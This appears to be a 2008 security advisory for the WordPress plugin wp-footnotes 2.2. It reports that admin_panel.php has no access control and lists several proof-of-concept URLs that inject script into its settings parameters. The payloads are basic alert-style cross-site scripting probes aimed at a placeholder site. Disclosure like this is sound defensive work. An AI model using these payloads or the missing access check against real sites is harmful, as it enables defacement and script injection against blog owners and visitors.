Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

phpShop <= v 0.8.1 Remote SQL injection / Filter Bypass

ITech Classifieds Multiple Remote  Vulnerabilities

Domain Trader v2.0 Xss Vulnerable

Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities

From:	nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date:	03.02.2008
Subject:	Wordpress Pluging wp-footnotes 2.2 (admin_panel.php) Multiple Vulnerabilites

################################################################
Wordpress Plugin wp-footnotes 2.2  admin_panel.php Multiple Vulnerabilities
Founded: 1st, February 2008 Founder: NBBN
################################################################

1) No Access Control.

An attacker can access the adminpanel of the footnotes.

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php

The result -> Many XSS Vulnerabilities. because no defines of variables. And
he can add his own code on the blog footer.


2) Multiple XSS Vuln's  (Register Globals: ON)

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot
notes_current_settings[priority]="><script>alert("XSS"
)</script>

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot
notes_current_settings[style_rules]=</textarea><script>alert("
XSS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current
_settings[pre_footnotes]=</textarea><script>alert("XSS"
)</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current
_settings[post_footnotes]=</textarea><script>alert(":-
(")